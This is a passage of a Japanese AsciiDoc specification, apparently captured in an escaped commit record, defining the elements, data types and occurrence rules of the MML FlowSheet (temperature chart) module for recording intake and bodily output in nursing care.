|string|?|\n|M23.5.|mmlFs:fsMemo| |string|?|\n|===\nOccurrence\u306a\u3057\uff1a\u5fc5\u305a1\u56de\u51fa\u73fe\uff0c?\uff1a 0\u56de\u3082\u3057\u304f\u306f1\u56de\u51fa\u73fe\uff0c+\uff1a 1\u56de\u4ee5\u4e0a\u51fa\u73fe\uff0c*\uff1a 0 \u56de\u4ee5\u4e0a\u51fa\u73fe\n\n#REQUIRED:\u5fc5\u9808\u5c5e\u6027\uff0c#IMPLIED:\u7701\u7565\u53ef\u80fd\u5c5e\u6027\n\n==== \u30a8\u30ec\u30e1\u30f3\u30c8\u89e3\u8aac\n===== M23. mmlFs:FlowSheetModule\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\n\n===== M23.1. mmlFs:context\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u304c\u8a18\u9332\u3055\u308c\u305f\u74b0\u5883\u306b\u3064\u3044\u3066\u306e\u60c5\u5831\u3092\u8868\u3059\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8 +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef\n\n===== M23.1.1. mmlFs:facility\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u65bd\u8a2d +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:facilityCode|string|#REQUIRED| |\n|mmlFs:facilityCodeId|string|#REQUIRED|MML0027|\u7528\u3044\u305f\u30b3\u30fc\u30c9\u4f53\u7cfb\u306e\u540d\u79f0\u3092\u8a18\u8f09\n|===\n\n===== M23.1.2. mmlFs:department\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u90e8\u7f72 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:depCode|string|#IMPLIED|MML0028|\n|mmlFs:depCodeId|string|#IMPLIED| | \t\tMML0028\u3068\u5165\u529b\n|===\n\n===== M23.1.3. mmlFs:ward\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u75c5\u68df\u30fb\u5834\u6240 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:wardCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a|\n|mmlFs:wardCodeId|string|#IMPLIED| |\u7528\u3044\u305f\u30c6\u30fc\u30d6\u30eb\u540d\u3092\u5165\u529b\n|===\n\n===== M23.1.4. mmlFs:observer\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u60c5\u5831\u306e\u89b3\u5bdf\u8005 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:obsCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a|\n|mmlFs:obsCodeId|string|#IMPLIED| |\u7528\u3044\u305f\u30c6\u30fc\u30d6\u30eb\u540d\u3092\u5165\u529b\n|===\n\n===== M23.2. mmlVs:VitalSignModule\n\u3010\u5185\u5bb9\u3011\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u60c5\u5831 +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u3011\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\u6e2c\u5b9a\u3055\u308c\u305f\u4e00\u9023\u306e\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u306e\u6570\u3060\u3051\u7e70\u308a\u8fd4\u3059\u3002(\u4f8b\uff1a\u30e9\u30a6\u30f3\u30c9\u6642\u306b\u8a08\u6e2c\u3055\u308c\u305f\u53ce\u7e2e\u671f\u8840\u5727\u3001\u62e1\u5f35\u671f\u8840\u5727\u3001\u8108\u62cd\u3001\u4f53\u6e29\u3001SpO2\uff09\n\n===== M23.3. mmlFs:intake\n\u3010\u5185\u5bb9\u3011\u6c34\u5206\u3084\u98df\u4e8b\u306a\u3069\u306e\u6442\u53d6\u72b6\u6cc1\u306b\u95a2\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8 +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u30110\u56de\u4ee5\u4e0a\u306e\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\n\n===== M23.3.1. mmlFs:intakeType\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u7a2e\u985e\u3002\u4f8b\uff1a\u671d\u98df(\u4e3b)\u3001\u663c\u98df\uff08\u526f\uff09\u3001\u6c34\u5206\u3001\u7d4c\u7ba1\u6804\u990a\u98df\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef\u3002 +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs01\n\n===== M23.3.2. mmlFs:intakeVolume\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u91cf\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.3. mmlFs:intakeUnit\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u5358\u4f4d\u3002\/10, ml, g, kcal, \u306a\u3069 +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs02\n\n===== M23.3.4. mmlFs:intakePathway\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u7d4c\u8def\u3002\u7d4c\u53e3\u6442\u53d6\u3001\u7d4c\u7ba1\u3001IVH\u7ba1\u7406\u306a\u3069 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.5. mmlFs:intakeStartTime\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u958b\u59cb\u6642\u9593\u3002\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3092\u8a18\u9332\u3059\u308b\u3002\u958b\u59cb\u3001\u7d42\u4e86\u306e\u5225\u306a\u304f\u8a18\u9332\u3092\u3059\u308b\u5834\u5408\u306b\u306f\u3053\u3061\u3089\u306b\u6642\u9593\u3092\u8a18\u5165\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.6. mmlFs:intakeEndTime\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u7d42\u4e86\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.3.7. mmlFs:intakeMemo\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u72b6\u6cc1\u306b\u95a2\u3059\u308b\u30b3\u30e1\u30f3\u30c8\u30fb\u30e1\u30e2\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4. mmlFs:bodilyOutput\n\u3010\u5185\u5bb9\u3011\u4f53\u5916\u306b\u6392\u6cc4\u3055\u308c\u308b\u3082\u306e\u306b\u3064\u3044\u3066\u8a18\u9332\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8\u3002\u5c3f\u3001\u4fbf\u4ee5\u5916\u306b\u3082\u80f8\u6c34\u3001\u8179\u6c34\u3001\u4f53\u6db2\u3001\u80c6\u6c41\u3001\u305d\u306e\u4ed6\u306e\u5206\u6ccc\u7269\u306a\u3069\u3082\u5bfe\u51e6\u3068\u3059\u308b\u3002 +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u30110\u56de\u4ee5\u4e0a\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\n\n===== M23.4.1. mmlFs:boType\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u7a2e\u985e\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs03\n\n===== M23.4.2. mmlFs:boVolume\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u91cf\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.3. mmlFs:boUnit\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u91cf\u306e\u5358\u4f4d\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs04\n\n===== M23.4.4. mmlFs:boStatus\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u6027\u72b6\u3002\u8edf\u4fbf\u3001\u4e0b\u75e2\u3001\u6df7\u6fc1\u306a\u3069\u3002\u5927\u91cf\u30fb\u4e2d\u7b49\u91cf\u3001\u5c11\u91cf\u306a\u3069\u6570\u5024\u5316\u3067\u304d\u306a\u3044\u5834\u5408\u306b\u306f\u3053\u3053\u306b\u8a18\u8f09\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.5. mmlFs:boColor\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306e\u8272\u8abf\u3002\u9ec4\u8272\u3001\u8336\u8910\u8272\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.6. mmlFs:pathway\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7d4c\u8def\u3001\u30ab\u30c6\u30fc\u30c6\u30eb\u3084\u30c9\u30ec\u30fc\u30f3\u3001\u30b9\u30c8\u30de\u306a\u3069 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.7. mmlFs:boStartTime\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u958b\u59cb\u6642\u9593\u3002\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3092\u8a18\u9332\u3059\u308b\u3002\u958b\u59cb\u3001\u7d42\u4e86\u306e\u5225\u306a\u304f\u8a18\u9332\u3092\u3059\u308b\u5834\u5408\u306b\u306f\u3053\u3061\u3089\u306b\u6642\u9593\u3092\u8a18\u5165\u3059\u308b\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.8. mmlFs:boEndTime\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7d42\u4e86\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.8. mmlFs:boMemo\n\u3010\u5185\u5bb9\u3011\u6392\u6cc4\u7269\u306b\u95a2\u3059\u308b\u30b3\u30e1\u30f3\u30c8\u3001\u30e1\u30e2\u3002\u4fbf\u79d83\u65e5\u76ee\u3001\u51fa\u8840\u306f\u53ce\u675f\u50be\u5411\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.9. mmlFs:boFrequency\n\u3010\u5185\u5bb9\u3011\u4e00\u5b9a\u6642\u9593\u5185\u306e\u6392\u6cc4\u56de\u6570\u3092\u8868\u73fe\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8\u3002 +\n\u3010\u7e70\u308a\u8fd4\u3057\u30110\u56de\u4ee5\u4e0a\u306e\u7e70\u308a\u8fd4\u3057\u3042\u308a\n\n===== M23.4.10. mmlFs:bofTimes\n\u3010\u5185\u5bb9\u3011\u4e00\u5b9a\u671f\u9593\u5185\u306b\u89b3\u5bdf\u3055\u308c\u305f\u6392\u6cc4\u56de\u6570\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011decimal +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.1. mmlFs:bofPeriodStartTime\n\u3010\u5185\u5bb9\u3011\u89b3\u5bdf\u3092\u958b\u59cb\u3057\u305f\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.2. mmlFs:bofPeriodEndTime\n\u3010\u5185\u5bb9\u3011\u89b3\u5bdf\u3092\u7d42\u4e86\u3057\u305f\u6642\u9593\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011dateTime +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.3 mmlFs:bofMemo\n\u3010\u5185\u5bb9\u3011\u6570\u5024\u5316\u3055\u308c\u306a\u3044\u983b\u5ea6\u8868\u73fe\u3002\u983b\u56de\u3001\u4e4f\u5c3f\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n\n===== M23.4.10.4. mmlFs:fsMemo\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u30b3\u30e1\u30f3\u30c8\u3001\u30e1\u30e2\u3002\u305d\u306e\u4ed6\u306e\u4f53\u6e29\u8868\u306b\u8a18\u8f09\u3059\u308b\u5185\u5bb9\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u7701\u7565\u53ef\n","old_contents":":Author: Shinji KOBAYASHI\n:Email: skoba@moss.gr.jp\n:toc: right\n:toclevels: 2\n:pagenums:\n:numberd:\n:sectnums:\n:imagesdir: .\/figures\n:linkcss:\n\n=== \u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\n==== \u76ee\u7684\u3068\u5bfe\u8c61\n\u65e5\u3005\u306e\u4ecb\u8b77\u3084\u770b\u8b77\u3067\u8a18\u9332\u3055\u308c\u308b\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u3002\n\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u304a\u3044\u3066\u306f\u3001\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u30e2\u30b8\u30e5\u30fc\u30eb\u3068\u3042\u308f\u305b\u3066\u3001\u98df\u4e8b\u6442\u53d6\u91cf\u3001\u6392\u6cc4\u306b\u3064\u3044\u3066\u306e\u60c5\u5831\u3092\u6271\u3063\u3066\u3044\u304f\u3002\u60f3\u5b9a\u3055\u308c\u308b\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306f\u4f53\u6e29\u8868\u306b\u8a18\u8f09\u3055\u308c\u308b\u5404\u7a2e\u60c5\u5831\u3067\u3042\u308b\u3002\n\n\u56f3\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u3084\u6442\u98df\u60c5\u5831\u3001\u6392\u6cc4\u306b\u95a2\u3059\u308b\u60c5\u5831\u306f\u7e70\u308a\u8fd4\u3057\u8a18\u9332\u3055\u308c\u308b\u3002\n\n==== namespace\u5ba3\u8a00\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306enamespace\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u5ba3\u8a00\u3059\u308b\u3002\n[source, xml]\n xmlns:mmlFs=\"http:\/\/www.medxml.net\/MML\/v4\/ContentModule\/FlowSheet\/1.0\"\n\n==== \u6587\u66f8\u30d8\u30c3\u30c0\u30fc\u60c5\u5831 (docInfo) \u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u500b\u5225\u4ed5\u69d8\n===== docInfo\n\u5c5e\u6027 contentModuleType \u306b MML0005 \u30c6\u30fc\u30d6\u30eb\u3088\u308a\u300cflowsheet\u300d\u3092\u5165\u529b\u3059\u308b\u3053\u3068\uff0e\n\n===== title\n\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306f\u75c5\u68df\u3042\u308b\u3044\u306f\u4ecb\u8b77\u65bd\u8a2d\u306a\u3069\u3067\u65e5\u3005\u8a18\u9332\u3055\u308c\u308b\u4f53\u6e29\u8868\u3092\u4e3b\u306a\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u3068\u8003\u3048\u3066\u3044\u308b\u3002\u3057\u305f\u304c\u3063\u3066\u3001\u30ec\u30dd\u30fc\u30c8\u30bf\u30a4\u30c8\u30eb\u3068\u3057\u3066\u306f\u300c\u4f53\u6e29\u8868\u300d\u3067\u3042\u308b\u3053\u3068\u3092\u524d\u63d0\u3068\u3059\u308b\u304c\u3001\u75c5\u68df\u3067\u6163\u7528\u7684\u306b\u5229\u7528\u3055\u308c\u308b\u300c\u71b1\u578b\u8868\u300d\u300c\u4f53\u6e29\u8868\u300d\u3084\u300c\u6e29\u5ea6\u677f\u300d\u306a\u3069\u304c\u3001\u30bf\u30a4\u30c8\u30eb\u3068\u3057\u3066\u4f7f\u7528\u3055\u308c\u308b\u3053\u3068\u3082\u60f3\u5b9a\u3057\u3066\u3044\u308b\u3002\n\n\u5c5e\u6027\u306e generationPurpose \u306f\uff0cMML0007 \u30c6\u30fc\u30d6\u30eb\u3088\u308a\u300cflowsheet\u300d (\u4f53\u6e29\u8868) \u3068\u5165\u529b\u3059\u308b\u3053\u3068\uff0e\n\n===== confirmDate\n\u30e2\u30b8\u30e5\u30fc\u30eb\u751f\u6210\u65e5\u3067\u3042\u308a\uff0c\u5168\u4f53\u3068\u3057\u3066\u306e\u5831\u544a\u304c\u306a\u3055\u308c\u305f\u6642\u523b\u3092\u793a\u3059\uff0e\n\n===== mmlCi:CreatorInfo\n\u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\u3067\u306f\u3001\u591a\u8077\u7a2e\u306b\u308f\u305f\u308b\u8907\u6570\u306e\u4eba\u9593\u304c\u89b3\u5bdf\u3057\u305f\u60c5\u5831\u304c\u4e00\u3064\u306e\u5831\u544a\u66f8\u306b\u8a18\u8f09\u3055\u308c\u308b\u3053\u3068\u304c\u3042\u308b\u3002\u6700\u7d42\u7684\u306a\u8a18\u8f09\u8005\u3042\u308b\u3044\u306f\u4ee3\u8868\u8005\u304c\u4f5c\u6210\u8005\u60c5\u5831\u3068\u3057\u3066\u8a18\u9332\u3055\u308c\u308b\u3002\n\n.\u30a8\u30ec\u30e1\u30f3\u30c8\u69cb\u9020\u56f3\nimage::mmlfs.png[]\n\n.\u30a8\u30ec\u30e1\u30f3\u30c8\u4e00\u89a7\u8868\n[options=\"header\"]\n|===\n| |Elements|Attribute|Data types|Occurrence|TableId\n|M23.|mmlFs:FlowSheetModule| | | |\n|M23.1.|mmlFs:context| | | |\n|M23.1.1.|mmlFs:facility| |string| |\n| | |mmlFs:facilityCode|string|#REQUIRED|\n| | |mmlFs:facilityCodeId|string|#REQUIRED|MML0027\n|M23.1.2.|mmlFs:department| |string|?|\n| | |mmlFs:depCode|string|#IMPLIED|MML0028\n| | |mmlFs:depCodeId|string|#IMPLIED|\n|M23.1.3.|mmlFs:ward| |string|?|\n| | |mmlFs:wardCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a\n| | |mmlFs:wardCodeId|string|#IMPLIED|\n|M23.1.4.|mmlFs:observer| |string|?|\n| | |mmlFs:obsCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a\n| | |mmlFs:obsCodeId|string|#IMPLIED|\n|M23.2.|mmlVs:VitalSignModule| | |*|\n|M23.3.|mmlFs:intake| | |*|\n|M23.3.1.|mmlFs:intakeType| |string| |mmlFs01\n|M23.3.2.|mmlFs:intakeVolume| |decimal|?|\n|M23.3.3.|mmlFs:intakeUnit| |string|?|mmlFs02\n|M23.3.4.|mmlFs:intakePathway| |string|?|\n|M23.3.5.|mmlFs:intakeStartTime| |dateTime|?|\n|M23.3.6.|mmlFs:intakeEndTime| |dateTime|?|\n|M23.3.7.|mmlFs:intakeMemo| |string|?|\n|M23.4.|mmlFs:bodilyOutput| | |*|\n|M23.4.1.|mmlFs:boType| |string| |mmlFs03\n|M23.4.2.|mmlFs:boVolume| |decimal|?|\n|M23.4.3.|mmlFs:boUnit| |string|?|mmlFs04\n|M23.4.4.|mmlFs:boStatus| |string|?|\n|M23.4.5.|mmlFs:boColor| |string|?|\n|M23.4.6.|mmlFs:boPathway| |string|?|\n|M23.4.7.|mmlFs:boStartTime| |dateTime|?|\n|M23.4.8.|mmlFs:boEndTime| |dateTime|?|\n|M23.4.9.|mmlFs:boMemo| |string|?|\n|M23.4.10.|mmlFs:boFrequency| | |*|\n|M23.4.10.1.|mmlFs:bofTimes| |decimal|?|\n|M23.4.10.2.|mmlFs:bofPeriodStartTime| |dateTime|?|\n|M23.4.10.3.|mmlFs:bofPeriodEndTime| |dateTime|?|\n|M23.4.10.4.|mmlFs:bofMemo| |string|?|\n|M23.5.|mmlFs:fsMemo| |string|?|\n|===\nOccurrence\u306a\u3057\uff1a\u5fc5\u305a1\u56de\u51fa\u73fe\uff0c?\uff1a 0\u56de\u3082\u3057\u304f\u306f1\u56de\u51fa\u73fe\uff0c+\uff1a 1\u56de\u4ee5\u4e0a\u51fa\u73fe\uff0c*\uff1a 0 \u56de\u4ee5\u4e0a\u51fa\u73fe\n\n#REQUIRED:\u5fc5\u9808\u5c5e\u6027\uff0c#IMPLIED:\u7701\u7565\u53ef\u80fd\u5c5e\u6027\n\n==== \u30a8\u30ec\u30e1\u30f3\u30c8\u89e3\u8aac\n===== M23. mmlFs:FlowSheetModule\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u30e2\u30b8\u30e5\u30fc\u30eb\n\n===== M23.1. mmlFs:context\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u304c\u8a18\u9332\u3055\u308c\u305f\u74b0\u5883\u306b\u3064\u3044\u3066\u306e\u60c5\u5831\u3092\u8868\u3059\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8 +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef\n\n===== M23.1.1. mmlFs:facility\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u65bd\u8a2d +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:facilityCode|string|#REQUIRED| |\n|mmlFs:facilityCodeId|string|#REQUIRED|MML0027|\u7528\u3044\u305f\u30b3\u30fc\u30c9\u4f53\u7cfb\u306e\u540d\u79f0\u3092\u8a18\u8f09\n|===\n\n===== M23.1.2. mmlFs:department\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u90e8\u7f72 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:depCode|string|#IMPLIED|MML0028|\n|mmlFs:depCodeId|string|#IMPLIED| | \t\tMML0028\u3068\u5165\u529b\n|===\n\n===== M23.1.3. mmlFs:ward\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u3092\u8a18\u9332\u3057\u305f\u75c5\u68df\u30fb\u5834\u6240 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:wardCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a|\n|mmlFs:wardCodeId|string|#IMPLIED| |\u7528\u3044\u305f\u30c6\u30fc\u30d6\u30eb\u540d\u3092\u5165\u529b\n|===\n\n===== M23.1.4. mmlFs:observer\n\u3010\u5185\u5bb9\u3011\u4f53\u6e29\u8868\u60c5\u5831\u306e\u89b3\u5bdf\u8005 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u5c5e\u6027\u3011\n[options=\"header\"]\n|===\n|\u5c5e\u6027\u540d|\u30c7\u30fc\u30bf\u578b|\u7701\u7565|\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb|\u8aac\u660e\n|mmlFs:obsCode|string|#IMPLIED|\u30e6\u30fc\u30b6\u6307\u5b9a|\n|mmlFs:obsCodeId|string|#IMPLIED| |\u7528\u3044\u305f\u30c6\u30fc\u30d6\u30eb\u540d\u3092\u5165\u529b\n|===\n\n===== M23.2. mmlVs:VitalSignModule\n\u3010\u5185\u5bb9\u3011\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u60c5\u5831 +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u3011\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\u6e2c\u5b9a\u3055\u308c\u305f\u4e00\u9023\u306e\u30d0\u30a4\u30bf\u30eb\u30b5\u30a4\u30f3\u306e\u6570\u3060\u3051\u7e70\u308a\u8fd4\u3059\u3002(\u4f8b\uff1a\u30e9\u30a6\u30f3\u30c9\u6642\u306b\u8a08\u6e2c\u3055\u308c\u305f\u53ce\u7e2e\u671f\u8840\u5727\u3001\u62e1\u5f35\u671f\u8840\u5727\u3001\u8108\u62cd\u3001\u4f53\u6e29\u3001SpO2\uff09\n\n===== M23.3. mmlFs:intake\n\u3010\u5185\u5bb9\u3011\u6c34\u5206\u3084\u98df\u4e8b\u306a\u3069\u306e\u6442\u53d6\u72b6\u6cc1\u306b\u95a2\u3059\u308b\u89aa\u30a8\u30ec\u30e1\u30f3\u30c8 +\n\u3010\u7701\u7565\u3011\u53ef +\n\u3010\u7e70\u308a\u8fd4\u3057\u8a2d\u5b9a\u30110\u56de\u4ee5\u4e0a\u306e\u7e70\u308a\u8fd4\u3057\u3042\u308a\u3002\n\n===== M23.3.1. mmlFs:intakeType\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u7a2e\u985e\u3002\u4f8b\uff1a\u671d\u98df(\u4e3b)\u3001\u663c\u98df\uff08\u526f\uff09\u3001\u6c34\u5206\u3001\u7d4c\u7ba1\u6804\u990a\u98df\u306a\u3069\u3002 +\n\u3010\u30c7\u30fc\u30bf\u578b\u3011string +\n\u3010\u7701\u7565\u3011\u4e0d\u53ef\u3002 +\n\u3010\u4f7f\u7528\u30c6\u30fc\u30d6\u30eb\u3011mmlFs01\n\n===== M23.3.2. mmlFs:intakeVolume\n\u3010\u5185\u5bb9\u3011\u6442\u53d6\u3057\u305f\u98df\u3079\u7269\u30fb\u98f2\u307f\u7269\u306e\u91cf\u3002 